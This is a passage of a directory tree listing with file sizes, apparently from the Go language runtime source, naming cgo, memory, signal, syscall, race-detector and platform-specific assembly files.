│ │ │ │ ├── [1.7K] gcc_linux_arm.c
│ │ │ │ ├── [1.7K] gcc_linux_mips64x.c
│ │ │ │ ├── [1.7K] gcc_linux_mipsx.c
│ │ │ │ ├── [3.0K] gcc_linux_ppc64x.S
│ │ │ │ ├── [1.6K] gcc_linux_riscv64.c
│ │ │ │ ├── [1.4K] gcc_linux_s390x.c
│ │ │ │ ├── [1.8K] gcc_mips64x.S
│ │ │ │ ├── [1.5K] gcc_mipsx.S
│ │ │ │ ├── [ 881] gcc_mmap.c
│ │ │ │ ├── [1.8K] gcc_netbsd_386.c
│ │ │ │ ├── [1.8K] gcc_netbsd_amd64.c
│ │ │ │ ├── [1.8K] gcc_netbsd_arm64.c
│ │ │ │ ├── [1.8K] gcc_netbsd_arm.c
│ │ │ │ ├── [1.3K] gcc_openbsd_386.c
│ │ │ │ ├── [1.3K] gcc_openbsd_amd64.c
│ │ │ │ ├── [1.4K] gcc_openbsd_arm64.c
│ │ │ │ ├── [1.4K] gcc_openbsd_arm.c
│ │ │ │ ├── [1.4K] gcc_openbsd_mips64.c
│ │ │ │ ├── [1.4K] gcc_ppc64x.c
│ │ │ │ ├── [1.6K] gcc_riscv64.S
│ │ │ │ ├── [1.4K] gcc_s390x.S
│ │ │ │ ├── [ 553] gcc_setenv.c
│ │ │ │ ├── [2.1K] gcc_sigaction.c
│ │ │ │ ├── [ 507] gcc_signal2_ios_arm64.c
│ │ │ │ ├── [6.0K] gcc_signal_ios_arm64.c
│ │ │ │ ├── [ 325] gcc_signal_ios_nolldb.c
│ │ │ │ ├── [1.8K] gcc_solaris_amd64.c
│ │ │ │ ├── [1.5K] gcc_traceback.c
│ │ │ │ ├── [1.8K] gcc_util.c
│ │ │ │ ├── [1.0K] gcc_windows_386.c
│ │ │ │ ├── [1.0K] gcc_windows_amd64.c
│ │ │ │ ├── [ 905] gcc_windows_arm64.c
│ │ │ │ ├── [3.6K] handle.go
│ │ │ │ ├── [ 646] iscgo.go
│ │ │ │ ├── [3.5K] libcgo.h
│ │ │ │ ├── [ 604] libcgo_unix.h
│ │ │ │ ├── [ 631] libcgo_windows.h
│ │ │ │ ├── [2.7K] linux.go
│ │ │ │ ├── [1.9K] linux_syscall.c
│ │ │ │ ├── [1.0K] mmap.go
│ │ │ │ ├── [ 546] netbsd.go
│ │ │ │ ├── [ 566] openbsd.go
│ │ │ │ ├── [ 597] setenv.go
│ │ │ │ ├── [ 877] sigaction.go
│ │ │ │ ├── [ 270] signal_ios_arm64.go
│ │ │ │ └── [1.8K] signal_ios_arm64.s
│ │ │ ├── [ 317] cgocallback.go
│ │ │ ├── [ 19K] cgocall.go
│ │ │ ├── [6.9K] cgocheck.go
│ │ │ ├── [2.0K] cgo.go
│ │ │ ├── [2.4K] cgo_mmap.go
│ │ │ ├── [ 418] cgo_ppc64x.go
│ │ │ ├── [3.3K] cgo_sigaction.go
│ │ │ ├── [ 24K] chan.go
│ │ │ ├── [3.3K] checkptr.go
│ │ │ ├── [ 410] compiler.go
│ │ │ ├── [1.6K] complex.go
│ │ │ ├── [ 533] cpuflags_amd64.go
│ │ │ ├── [ 334] cpuflags_arm64.go
│ │ │ ├── [ 810] cpuflags.go
│ │ │ ├── [6.8K] cpuprof.go
│ │ │ ├── [ 437] cputicks.go
│ │ │ ├── [4.0K] debug
│ │ │ │ ├── [ 425] debug.s
│ │ │ │ ├── [7.2K] garbage.go
│ │ │ │ ├── [6.4K] mod.go
│ │ │ │ ├── [ 756] stack.go
│ │ │ │ └── [ 402] stubs.go
│ │ │ ├── [6.2K] debugcall.go
│ │ │ ├── [3.2K] debug.go
│ │ │ ├── [ 17K] debuglog.go
│ │ │ ├── [ 357] debuglog_off.go
│ │ │ ├── [1.1K] debuglog_on.go
│ │ │ ├── [ 845] defs1_linux.go
│ │ │ ├── [2.8K] defs1_netbsd_386.go
│ │ │ ├── [3.1K] defs1_netbsd_amd64.go
│ │ │ ├── [3.2K] defs1_netbsd_arm64.go
│ │ │ ├── [2.9K] defs1_netbsd_arm.go
│ │ │ ├── [4.0K] defs1_solaris_amd64.go
│ │ │ ├── [3.5K] defs2_linux.go
│ │ │ ├── [1.1K] defs3_linux.go
│ │ │ ├── [4.2K] defs_aix.go
│ │ │ ├── [3.6K] defs_aix_ppc64.go
│ │ │ ├── [2.7K] defs_arm_linux.go
│ │ │ ├── [6.1K] defs_darwin_amd64.go
│ │ │ ├── [3.9K] defs_darwin_arm64.go
│ │ │ ├── [3.8K] defs_darwin.go
│ │ │ ├── [3.3K] defs_dragonfly_amd64.go
│ │ │ ├── [2.6K] defs_dragonfly.go
│ │ │ ├── [4.4K] defs_freebsd_386.go
│ │ │ ├── [4.6K] defs_freebsd_amd64.go
│ │ │ ├── [4.0K] defs_freebsd_arm64.go
│ │ │ ├── [3.7K] defs_freebsd_arm.go
│ │ │ ├── [3.8K] defs_freebsd.go
│ │ │ ├── [ 285] defs_illumos_amd64.go
│ │ │ ├── [4.4K] defs_linux_386.go
│ │ │ ├── [4.9K] defs_linux_amd64.go
│ │ │ ├── [3.9K] defs_linux_arm64.go
│ │ │ ├── [4.1K] defs_linux_arm.go
│ │ │ ├── [3.2K] defs_linux.go
│ │ │ ├── [3.8K] defs_linux_mips64x.go
│ │ │ ├── [3.8K] defs_linux_mipsx.go
│ │ │ ├── [3.9K] defs_linux_ppc64.go
│ │ │ ├── [3.9K] defs_linux_ppc64le.go
│ │ │ ├── [4.1K] defs_linux_riscv64.go
│ │ │ ├── [3.4K] defs_linux_s390x.go
│ │ │ ├── [ 855] defs_netbsd_386.go
│ │ │ ├── [1.0K] defs_netbsd_amd64.go
│ │ │ ├── [ 764] defs_netbsd_arm.go
│ │ │ ├── [2.7K] defs_netbsd.go
│ │ │ ├── [2.9K] defs_openbsd_386.go
│ │ │ ├── [3.1K] defs_openbsd_amd64.go
│ │ │ ├── [2.7K] defs_openbsd_arm64.go
│ │ │ ├── [3.0K] defs_openbsd_arm.go
│ │ │ ├── [3.1K] defs_openbsd.go
│ │ │ ├── [2.6K] defs_openbsd_mips64.go
│ │ │ ├── [1.6K] defs_plan9_386.go
│ │ │ ├── [1.8K] defs_plan9_amd64.go
│ │ │ ├── [1.7K] defs_plan9_arm.go
│ │ │ ├── [1004] defs_solaris_amd64.go
│ │ │ ├── [3.3K] defs_solaris.go
│ │ │ ├── [2.0K] defs_windows_386.go
│ │ │ ├── [2.7K] defs_windows_amd64.go
│ │ │ ├── [2.6K] defs_windows_arm64.go
│ │ │ ├── [2.1K] defs_windows_arm.go
│ │ │ ├── [2.1K] defs_windows.go
│ │ │ ├── [8.2K] duff_386.s
│ │ │ ├── [5.6K] duff_amd64.s
│ │ │ ├── [5.3K] duff_arm64.s
│ │ │ ├── [7.1K] duff_arm.s
│ │ │ ├── [ 11K] duff_mips64x.s
│ │ │ ├── [7.1K] duff_ppc64x.s
│ │ │ ├── [ 11K] duff_riscv64.s
│ │ │ ├── [ 507] duff_s390x.s
│ │ │ ├── [3.0K] env_plan9.go
│ │ │ ├── [1.8K] env_posix.go
│ │ │ ├── [9.2K] error.go
│ │ │ ├── [ 13K] extern.go
│ │ │ ├── [1.2K] fastlog2.go
│ │ │ ├── [ 904] fastlog2table.go
│ │ │ ├── [1.4K] float.go
│ │ │ ├── [2.6K] funcdata.h
│ │ │ ├── [ 366] go_tls.h
│ │ │ ├── [ 13K] HACKING.md
│ │ │ ├── [1.6K] hash32.go
│ │ │ ├── [1.9K] hash64.go
│ │ │ ├── [ 18K] heapdump.go
│ │ │ ├── [6.2K] histogram.go
│ │ │ ├── [ 16K] iface.go
│ │ │ ├── [4.0K] internal
│ │ │ │ ├── [4.0K] atomic
│ │ │ │ │ ├── [1.9K] atomic_386.go
│ │ │ │ │ ├── [5.1K] atomic_386.s
│ │ │ │ │ ├── [2.1K] atomic_amd64.go
│ │ │ │ │ ├── [4.0K] atomic_amd64.s
│ │ │ │ │ ├── [1.8K] atomic_arm64.go
│ │ │ │ │ ├── [6.5K] atomic_arm64.s
│ │ │ │ │ ├── [4.7K] atomic_arm.go
│ │ │ │ │ ├── [5.3K] atomic_arm.s
│ │ │ │ │ ├── [1.8K] atomic_mips64x.go
│ │ │ │ │ ├── [6.1K] atomic_mips64x.s
│ │ │ │ │ ├── [2.7K] atomic_mipsx.go
│ │ │ │ │ ├── [4.3K] atomic_mipsx.s
│ │ │ │ │ ├── [1.8K] atomic_ppc64x.go
│ │ │ │ │ ├── [6.4K] atomic_ppc64x.s
│ │ │ │ │ ├── [1.7K] atomic_riscv64.go
│ │ │ │ │ ├── [6.1K] atomic_riscv64.s
│ │ │ │ │ ├── [2.1K] atomic_s390x.go
│ │ │ │ │ ├── [5.9K] atomic_s390x.s
│ │ │ │ │ ├── [5.3K] atomic_wasm.go
│ │ │ │ │ ├── [ 269] atomic_wasm.s
│ │ │ │ │ ├── [ 771] doc.go
│ │ │ │ │ ├── [1.2K] stubs.go
│ │ │ │ │ ├── [3.1K] sys_linux_arm.s
│ │ │ │ │ ├── [1.3K] sys_nonlinux_arm.s
│ │ │ │ │ ├── [1.1K] types_64bit.go
│ │ │ │ │ ├── [ 11K] types.go
│ │ │ │ │ └── [ 246] unaligned.go
│ │ │ │ ├── [4.0K] math
│ │ │ │ │ └── [1.1K] math.go
│ │ │ │ ├── [4.0K] sys
│ │ │ │ │ ├── [1.3K] consts.go
│ │ │ │ │ ├── [1.0K] intrinsics_386.s
│ │ │ │ │ ├── [7.1K] intrinsics_common.go
│ │ │ │ │ ├── [2.4K] intrinsics.go
│ │ │ │ │ ├── [ 322] intrinsics_stubs.go
│ │ │ │ │ └── [ 283] sys.go
│ │ │ │ └── [4.0K] syscall
│ │ │ │ ├── [ 861] asm_linux_386.s
│ │ │ │ ├── [ 822] asm_linux_amd64.s
│ │ │ │ ├── [ 645] asm_linux_arm64.s
│ │ │ │ ├── [ 696] asm_linux_arm.s
│ │ │ │ ├── [ 668] asm_linux_mips64x.s
│ │ │ │ ├── [ 820] asm_linux_mipsx.s
│ │ │ │ ├── [ 681] asm_linux_ppc64x.s
│ │ │ │ ├── [ 655] asm_linux_riscv64.s
│ │ │ │ ├── [ 663] asm_linux_s390x.s
│ │ │ │ └── [ 521] syscall_linux.go
│ │ │ ├── [ 532] lfstack_32bit.go
│ │ │ ├── [2.2K] lfstack_64bit.go
│ │ │ ├── [1.8K] lfstack.go
│ │ │ ├── [ 941] libfuzzer_amd64.s
│ │ │ ├── [ 752] libfuzzer_arm64.s
│ │ │ ├── [2.6K] libfuzzer.go
│ │ │ ├── [5.2K] lock_futex.go
│ │ │ ├── [5.8K] lock_js.go
│ │ │ ├── [ 12K] lockrank.go
│ │ │ ├── [1.1K] lockrank_off.go
│ │ │ ├── [9.8K] lockrank_on.go
│ │ │ ├── [6.7K] lock_sema.go
│ │ │ ├── [ 178] Makefile
│ │ │ ├── [ 50K] malloc.go
│ │ │ ├── [ 13K] map_fast32.go
│ │ │ ├── [ 13K] map_fast64.go
│ │ │ ├── [ 14K] map_faststr.go
│ │ │ ├── [ 44K] map.go
│ │ │ ├── [ 12K] mbarrier.go
│ │ │ ├── [ 66K] mbitmap.go
│ │ │ ├── [8.9K] mcache.go
│ │ │ ├── [7.9K] mcentral.go
│ │ │ ├── [2.8K] mcheckmark.go
│ │ │ ├── [1.9K] mem_aix.go
│ │ │ ├── [2.0K] mem_bsd.go
│ │ │ ├── [2.4K] memclr_386.s
│ │ │ ├── [3.8K] memclr_amd64.s
│ │ │ ├── [3.6K] memclr_arm64.s
│ │ │ ├── [2.6K] memclr_arm.s
│ │ │ ├── [1.7K] memclr_mips64x.s
│ │ │ ├── [1.3K] memclr_mipsx.s
│ │ │ ├── [ 983] memclr_plan9_386.s
│ │ │ ├── [ 511] memclr_plan9_amd64.s
│ │ │ ├── [4.2K] memclr_ppc64x.s
│ │ │ ├── [ 978] memclr_riscv64.s
│ │ │ ├── [2.0K] memclr_s390x.s
│ │ │ ├── [ 622] memclr_wasm.s
│ │ │ ├── [1.8K] mem_darwin.go
│ │ │ ├── [5.3K] mem.go
│ │ │ ├── [2.2K] mem_js.go
│ │ │ ├── [6.1K] mem_linux.go
│ │ │ ├── [4.4K] memmove_386.s
│ │ │ ├── [ 12K] memmove_amd64.s
│ │ │ ├── [6.0K] memmove_arm64.s
│ │ │ ├── [5.9K] memmove_arm.s
│ │ │ ├── [1.8K] memmove_mips64x.s
│ │ │ ├── [4.4K] memmove_mipsx.s
│ │ │ ├── [3.1K] memmove_plan9_386.s
│ │ │ ├── [3.0K] memmove_plan9_amd64.s
│ │ │ ├── [4.6K] memmove_ppc64x.s
│ │ │ ├── [1.9K] memmove_riscv64.s
│ │ │ ├── [2.9K] memmove_s390x.s
│ │ │ ├── [1.7K] memmove_wasm.s
│ │ │ ├── [4.3K] mem_plan9.go
│ │ │ ├── [3.8K] mem_windows.go
│ │ │ ├── [4.0K] metrics
│ │ │ │ ├── [8.6K] description.go
│ │ │ │ ├── [6.6K] doc.go
│ │ │ │ ├── [1.3K] histogram.go
│ │ │ │ ├── [1.7K] sample.go
│ │ │ │ └── [1.8K] value.go
│ │ │ ├── [ 18K] metrics.go
│ │ │ ├── [ 16K] mfinal.go
│ │ │ ├── [3.1K] mfixalloc.go
│ │ │ ├── [ 55K] mgc.go
│ │ │ ├── [ 47K] mgcmark.go
│ │ │ ├── [ 40K] mgcpacer.go
│ │ │ ├── [ 37K] mgcscavenge.go
│ │ │ ├── [ 11K] mgcstack.go
│ │ │ ├── [ 28K] mgcsweep.go
│ │ │ ├── [ 13K] mgcwork.go
│ │ │ ├── [ 67K] mheap.go
│ │ │ ├── [7.3K] mkduff.go
│ │ │ ├── [1.3K] mkfastlog2table.go
│ │ │ ├── [ 14K] mkpreempt.go
│ │ │ ├── [9.3K] mksizeclasses.go
│ │ │ ├── [ 821] mmap.go
│ │ │ ├── [3.4K] mpagealloc_32bit.go
│ │ │ ├── [6.5K] mpagealloc_64bit.go
│ │ │ ├── [ 37K] mpagealloc.go
│ │ │ ├── [5.5K] mpagecache.go
│ │ │ ├── [ 13K] mpallocbits.go
│ │ │ ├── [ 26K] mprof.go
│ │ │ ├── [ 12K] mranges.go
│ │ │ ├── [4.0K] msan
│ │ │ │ └── [ 692] msan.go
│ │ │ ├── [ 725] msan0.go
│ │ │ ├── [2.3K] msan_amd64.s
│ │ │ ├── [2.0K] msan_arm64.s
│ │ │ ├── [1.5K] msan.go
│ │ │ ├── [ 777] msize.go
│ │ │ ├── [ 12K] mspanset.go
│ │ │ ├── [ 29K] mstats.go
│ │ │ ├── [9.3K] mwbbuf.go
│ │ │ ├── [ 344] nbpipe_pipe2.go
│ │ │ ├── [ 405] nbpipe_pipe.go
│ │ │ ├── [ 645] net_plan9.go
│ │ │ ├── [4.8K] netpoll_aix.go
│ │ │ ├── [4.2K] netpoll_epoll.go
│ │ │ ├── [ 652] netpoll_fake.go
│ │ │ ├── [ 18K] netpoll.go
│ │ │ ├── [4.6K] netpoll_kqueue.go
│ │ │ ├── [ 11K] netpoll_solaris.go
│ │ │ ├── [1.4K] netpoll_stub.go
│ │ │ ├── [3.7K] netpoll_windows.go
│ │ │ ├── [ 20K] os2_aix.go
│ │ │ ├── [ 302] os2_freebsd.go
│ │ │ ├── [ 296] os2_openbsd.go
│ │ │ ├── [1.5K] os2_plan9.go
│ │ │ ├── [ 320] os2_solaris.go
│ │ │ ├── [3.9K] os3_plan9.go
│ │ │ ├── [ 17K] os3_solaris.go
│ │ │ ├── [8.6K] os_aix.go
│ │ │ ├── [ 463] os_android.go
│ │ │ ├── [ 416] os_darwin_arm64.go
│ │ │ ├── [ 12K] os_darwin.go
│ │ │ ├── [7.0K] os_dragonfly.go
│ │ │ ├── [ 603] os_freebsd2.go
│ │ │ ├── [ 658] os_freebsd_amd64.go
│ │ │ ├── [ 398] os_freebsd_arm64.go
│ │ │ ├── [1.3K] os_freebsd_arm.go
│ │ │ ├── [ 12K] os_freebsd.go
│ │ │ ├── [ 241] os_freebsd_noauxv.go
│ │ │ ├── [3.9K] os_illumos.go
│ │ │ ├── [3.2K] os_js.go
│ │ │ ├── [ 556] os_linux_arm64.go
│ │ │ ├── [1.4K] os_linux_arm.go
│ │ │ ├── [ 824] os_linux_be64.go
│ │ │ ├── [ 888] os_linux_generic.go
│ │ │ ├── [ 26K] os_linux.go
│ │ │ ├── [1.1K] os_linux_mips64x.go
│ │ │ ├── [1.1K] os_linux_mipsx.go
│ │ │ ├── [ 325] os_linux_noauxv.go
│ │ │ ├── [ 325] os_linux_novdso.go
│ │ │ ├── [ 526] os_linux_ppc64x.go
│ │ │ ├── [ 198] os_linux_riscv64.go
│ │ │ ├── [ 316] os_linux_s390x.go
│ │ │ ├── [ 234] os_linux_x86.go
│ │ │ ├── [ 617] os_netbsd_386.go
│ │ │ ├── [ 614] os_netbsd_amd64.go
│ │ │ ├── [ 856] os_netbsd_arm64.go
│ │ │ ├── [1.2K] os_netbsd_arm.go
│ │ │ ├── [9.8K] os_netbsd.go
│ │ │ ├── [ 437] os_nonopenbsd.go
│ │ │ ├── [ 357] os_only_solaris.go
│ │ │ ├── [ 416] os_openbsd_arm64.go
│ │ │ ├── [ 749] os_openbsd_arm.go
│ │ │ ├── [6.6K] os_openbsd.go
│ │ │ ├── [1.7K] os_openbsd_libc.go
│ │ │ ├── [ 416] os_openbsd_mips64.go
│ │ │ ├── [ 441] os_openbsd_syscall1.go
│ │ │ ├── [2.4K] os_openbsd_syscall2.go
│ │ │ ├── [1.3K] os_openbsd_syscall.go
│ │ │ ├── [ 462] os_plan9_arm.go
│ │ │ ├── [ 10K] os_plan9.go
│ │ │ ├── [6.6K] os_solaris.go
│ │ │ ├── [ 339] os_windows_arm64.go
│ │ │ ├── [ 511] os_windows_arm.go
│ │ │ ├── [ 44K] os_windows.go
│ │ │ ├── [4.8K] panic32.go
│ │ │ ├── [ 38K] panic.go
│ │ │ ├── [4.3K] plugin.go
│ │ │ ├── [4.0K] pprof
│ │ │ │ ├── [2.8K] elf.go
│ │ │ │ ├── [2.9K] label.go
│ │ │ │ ├── [1.9K] map.go
│ │ │ │ ├── [ 28K] pprof.go
│ │ │ │ ├── [ 378] pprof_norusage.go
│ │ │ │ ├── [ 838] pprof_rusage.go
│ │ │ │ ├── [2.5K] protobuf.go
│ │ │ │ ├── [ 25K] proto.go
│ │ │ │ ├── [2.9K] protomem.go
│ │ │ │ ├── [1.5K] runtime.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [4.0K] mappingtest
│ │ │ │ │ └── [2.0K] main.go
│ │ │ │ ├── [ 411] README
│ │ │ │ ├── [ 528] test32
│ │ │ │ ├── [ 520] test32be
│ │ │ │ ├── [ 760] test64
│ │ │ │ └── [ 856] test64be
│ │ │ ├── [ 824] preempt_386.s
│ │ │ ├── [1.6K] preempt_amd64.s
│ │ │ ├── [2.0K] preempt_arm64.s
│ │ │ ├── [1.5K] preempt_arm.s
│ │ │ ├── [ 15K] preempt.go
│ │ │ ├── [2.7K] preempt_mips64x.s
│ │ │ ├── [2.7K] preempt_mipsx.s
│ │ │ ├── [ 290] preempt_nonwindows.go
│ │ │ ├── [2.7K] preempt_ppc64x.s
│ │ │ ├── [2.3K] preempt_riscv64.s
│ │ │ ├── [1.0K] preempt_s390x.s
│ │ │ ├── [ 176] preempt_wasm.s
│ │ │ ├── [6.0K] print.go
│ │ │ ├── [173K] proc.go
│ │ │ ├── [ 18K] profbuf.go
│ │ │ ├── [1.5K] proflabel.go
│ │ │ ├── [4.0K] race
│ │ │ │ ├── [ 360] doc.go
│ │ │ │ ├── [526K] race_darwin_amd64.syso
│ │ │ │ ├── [474K] race_darwin_arm64.syso
│ │ │ │ ├── [694K] race_freebsd_amd64.syso
│ │ │ │ ├── [ 768] race.go
│ │ │ │ ├── [540K] race_linux_amd64.syso
│ │ │ │ ├── [518K] race_linux_arm64.syso
│ │ │ │ ├── [654K] race_linux_ppc64le.syso
│ │ │ │ ├── [698K] race_netbsd_amd64.syso
│ │ │ │ ├── [673K] race_openbsd_amd64.syso
│ │ │ │ ├── [450K] race_windows_amd64.syso
│ │ │ │ ├── [1.4K] README
│ │ │ │ └── [4.0K] testdata
│ │ │ │ └── [ 415] cgo_test_main.go
│ │ │ ├── [2.8K] race0.go
│ │ │ ├── [ 14K] race_amd64.s
│ │ │ ├── [ 14K] race_arm64.s
│ │ │ ├── [ 19K] race.go
│ │ │ ├── [ 18K] race_ppc64le.s
│ │ │ ├── [ 553] rdebug.go
│ │ │ ├── [ 598] relax_stub.go
│ │ │ ├── [4.3K] rt0_aix_ppc64.s
│ │ │ ├── [ 822] rt0_android_386.s
│ │ │ ├── [ 754] rt0_android_amd64.s
│ │ │ ├── [ 941] rt0_android_arm64.s
│ │ │ ├── [ 843] rt0_android_arm.s
│ │ │ ├── [ 399] rt0_darwin_amd64.s
│ │ │ ├── [1.7K] rt0_darwin_arm64.s
│ │ │ ├── [ 448] rt0_dragonfly_amd64.s
│ │ │ ├── [ 454] rt0_freebsd_386.s
│ │ │ ├── [ 442] rt0_freebsd_amd64.s
│ │ │ ├── [1.9K] rt0_freebsd_arm64.s
│ │ │ ├── [ 298] rt0_freebsd_arm.s
│ │ │ ├── [ 311] rt0_illumos_amd64.s
│ │ │ ├── [ 425] rt0_ios_amd64.s
│ │ │ ├── [ 425] rt0_ios_arm64.s
│ │ │ ├── [2.3K] rt0_js_wasm.s
│ │ │ ├── [ 450] rt0_linux_386.s
│ │ │ ├── [ 307] rt0_linux_amd64.s
│ │ │ ├── [1.8K] rt0_linux_arm64.s
│ │ │ ├── [1007] rt0_linux_arm.s
│ │ │ ├── [1014] rt0_linux_mips64x.s
│ │ │ ├── [ 797] rt0_linux_mipsx.s
│ │ │ ├── [4.3K] rt0_linux_ppc64le.s
│ │ │ ├── [ 865] rt0_linux_ppc64.s
│ │ │ ├── [2.6K] rt0_linux_riscv64.s
│ │ │ ├── [ 676] rt0_linux_s390x.s
│ │ │ ├── [ 452] rt0_netbsd_386.s
│ │ │ ├── [ 309] rt0_netbsd_amd64.s
│ │ │ ├── [1.8K] rt0_netbsd_arm64.s
│ │ │ ├── [ 296] rt0_netbsd_arm.s
│ │ │ ├── [ 454] rt0_openbsd_386.s
│ │ │ ├── [ 311] rt0_openbsd_amd64.s
│ │ │ ├── [2.0K] rt0_openbsd_arm64.s
│ │ │ ├── [ 298] rt0_openbsd_arm.s
│ │ │ ├── [ 976] rt0_openbsd_mips64.s
│ │ │ ├── [ 523] rt0_plan9_386.s
│ │ │ ├── [ 481] rt0_plan9_amd64.s
│ │ │ ├── [ 397] rt0_plan9_arm.s
│ │ │ ├── [ 311] rt0_solaris_amd64.s
│ │ │ ├── [1.3K] rt0_windows_386.s
│ │ │ ├── [ 986] rt0_windows_amd64.s
│ │ │ ├── [ 725] rt0_windows_arm64.s
│ │ │ ├── [ 386] rt0_windows_arm.s
│ │ │ ├── [ 13K] runtime1.go
│ │ │ ├── [ 42K] runtime2.go
│ │ │ ├── [ 15K] runtime-gdb.py
│ │ │ ├── [1.4K] runtime.go
│ │ │ ├── [3.5K] rwmutex.go
│ │ │ ├── [ 15K] select.go
│ │ │ ├── [ 16K] sema.go
│ │ │ ├── [ 489] sigaction.go
│ │ │ ├── [1.7K] signal_386.go
│ │ │ ├── [3.5K] signal_aix_ppc64.go
│ │ │ ├── [2.7K] signal_amd64.go
│ │ │ ├── [3.1K] signal_arm64.go
│ │ │ ├── [2.5K] signal_arm.go
│ │ │ ├── [3.8K] signal_darwin_amd64.go
│ │ │ ├── [3.6K] signal_darwin_arm64.go
│ │ │ ├── [2.1K] signal_darwin.go
│ │ │ ├── [2.0K] signal_dragonfly_amd64.go
│ │ │ ├── [2.2K] signal_dragonfly.go
│ │ │ ├── [1.6K] signal_freebsd_386.go
│ │ │ ├── [2.0K] signal_freebsd_amd64.go
│ │ │ ├── [3.2K] signal_freebsd_arm64.go
│ │ │ ├── [2.2K] signal_freebsd_arm.go
│ │ │ ├── [2.2K] signal_freebsd.go
│ │ │ ├── [1.6K] signal_linux_386.go
│ │ │ ├── [2.1K] signal_linux_amd64.go
│ │ │ ├── [2.9K] signal_linux_arm64.go
│ │ │ ├── [2.1K] signal_linux_arm.go
│ │ │ ├── [3.3K] signal_linux_mips64x.go
│ │ │ ├── [3.7K] signal_linux_mipsx.go
│ │ │ ├── [3.4K] signal_linux_ppc64x.go
│ │ │ ├── [2.9K] signal_linux_riscv64.go
│ │ │ ├── [4.5K] signal_linux_s390x.go
│ │ │ ├── [3.2K] signal_mips64x.go
│ │ │ ├── [3.1K] signal_mipsx.go
│ │ │ ├── [1.8K] signal_netbsd_386.go
│ │ │ ├── [2.3K] signal_netbsd_amd64.go
│ │ │ ├── [3.4K] signal_netbsd_arm64.go
│ │ │ ├── [2.3K] signal_netbsd_arm.go
│ │ │ ├── [2.2K] signal_netbsd.go
│ │ │ ├── [1.6K] signal_openbsd_386.go
│ │ │ ├── [2.0K] signal_openbsd_amd64.go
│ │ │ ├── [3.4K] signal_openbsd_arm64.go
│ │ │ ├── [2.1K] signal_openbsd_arm.go
│ │ │ ├── [2.2K] signal_openbsd.go
│ │ │ ├── [3.3K] signal_openbsd_mips64.go
│ │ │ ├── [1.9K] signal_plan9.go
│ │ │ ├── [3.6K] signal_ppc64x.go
│ │ │ ├── [2.9K] signal_riscv64.go
│ │ │ ├── [2.5K] signal_solaris_amd64.go
│ │ │ ├── [4.5K] signal_solaris.go
│ │ │ ├── [ 41K] signal_unix.go
│ │ │ ├── [9.3K] signal_windows.go
│ │ │ ├── [7.7K] sigqueue.go
│ │ │ ├── [ 648] sigqueue_note.go
│ │ │ ├── [3.3K] sigqueue_plan9.go
│ │ │ ├── [ 11K] sigtab_aix.go
│ │ │ ├── [3.5K] sigtab_linux_generic.go
│ │ │ ├── [6.0K] sigtab_linux_mipsx.go
│ │ │ ├── [9.1K] sizeclasses.go
│ │ │ ├── [9.4K] slice.go
│ │ │ ├── [ 12K] softfloat64.go
│ │ │ ├── [ 43K] stack.go
│ │ │ ├── [ 11K] string.go
│ │ │ ├── [1.1K] stubs2.go
│ │ │ ├── [ 550] stubs_386.go
│ │ │ ├── [ 274] stubs3.go
│ │ │ ├── [1.2K] stubs_amd64.go
│ │ │ ├── [ 555] stubs_arm64.go
│ │ │ ├── [ 531] stubs_arm.go
│ │ │ ├── [ 18K] stubs.go
│ │ │ ├── [ 650] stubs_linux.go
│ │ │ ├── [ 364] stubs_mips64x.go
│ │ │ ├── [ 283] stubs_mipsx.go
│ │ │ ├── [ 298] stubs_nonlinux.go
│ │ │ ├── [ 301] stubs_ppc64.go
│ │ │ ├── [ 453] stubs_ppc64x.go
│ │ │ ├── [ 460] stubs_riscv64.go
│ │ │ ├── [ 256] stubs_s390x.go
│ │ │ ├── [ 36K] symtab.go
│ │ │ ├── [7.4K] sys_aix_ppc64.s
│ │ │ ├── [ 469] sys_arm64.go
│ │ │ ├── [ 521] sys_arm.go
│ │ │ ├── [1.6K] syscall2_solaris.go
│ │ │ ├── [6.0K] syscall_aix.go
│ │ │ ├── [8.0K] syscall_solaris.go
│ │ │ ├── [ 17K] syscall_windows.go
│ │ │ ├── [ 19K] sys_darwin_amd64.s
│ │ │ ├── [1.7K] sys_darwin_arm64.go
│ │ │ ├── [ 16K] sys_darwin_arm64.s
│ │ │ ├── [ 18K] sys_darwin.go
│ │ │ ├── [7.9K] sys_dragonfly_amd64.s
│ │ │ ├── [8.4K] sys_freebsd_386.s
│ │ │ ├── [ 10K] sys_freebsd_amd64.s
│ │ │ ├── [9.2K] sys_freebsd_arm64.s
│ │ │ ├── [ 10K] sys_freebsd_arm.s
│ │ │ ├── [1.8K] sys_libc.go
│ │ │ ├── [ 18K] sys_linux_386.s
│ │ │ ├── [ 16K] sys_linux_amd64.s
│ │ │ ├── [ 18K] sys_linux_arm64.s
│ │ │ ├── [ 16K] sys_linux_arm.s
│ │ │ ├── [ 13K] sys_linux_mips64x.s
│ │ │ ├── [ 11K] sys_linux_mipsx.s
│ │ │ ├── [ 22K] sys_linux_ppc64x.s
│ │ │ ├── [ 13K] sys_linux_riscv64.s
│ │ │ ├── [ 11K] sys_linux_s390x.s
│ │ │ ├── [ 500] sys_mips64x.go
│ │ │ ├── [ 496] sys_mipsx.go
│ │ │ ├── [9.5K] sys_netbsd_386.s
│ │ │ ├── [9.4K] sys_netbsd_amd64.s
│ │ │ ├── [9.2K] sys_netbsd_arm64.s
│ │ │ ├── [ 10K] sys_netbsd_arm.s
│ │ │ ├── [ 245] sys_nonppc64x.go
│ │ │ ├── [1.2K] sys_openbsd1.go
│ │ │ ├── [8.3K] sys_openbsd2.go
│ │ │ ├── [ 20K] sys_openbsd_386.s
│ │ │ ├── [3.4K] sys_openbsd3.go
│ │ │ ├── [ 16K] sys_openbsd_amd64.s
│ │ │ ├── [ 15K] sys_openbsd_arm64.s
│ │ │ ├── [ 18K] sys_openbsd_arm.s
│ │ │ ├── [2.6K] sys_openbsd.go
│ │ │ ├── [8.6K] sys_openbsd_mips64.s
│ │ │ ├── [4.5K] sys_plan9_386.s
│ │ │ ├── [4.5K] sys_plan9_amd64.s
│ │ │ ├── [7.0K] sys_plan9_arm.s
│ │ │ ├── [ 532] sys_ppc64x.go
│ │ │ ├── [ 469] sys_riscv64.go
│ │ │ ├── [ 469] sys_s390x.go
│ │ │ ├── [6.4K] sys_solaris_amd64.s
│ │ │ ├── [ 754] sys_wasm.go
│ │ │ ├── [2.6K] sys_wasm.s
│ │ │ ├── [7.7K] sys_windows_386.s
│ │ │ ├── [8.9K] sys_windows_amd64.s
│ │ │ ├── [ 11K] sys_windows_arm64.s
│ │ │ ├── [ 12K] sys_windows_arm.s
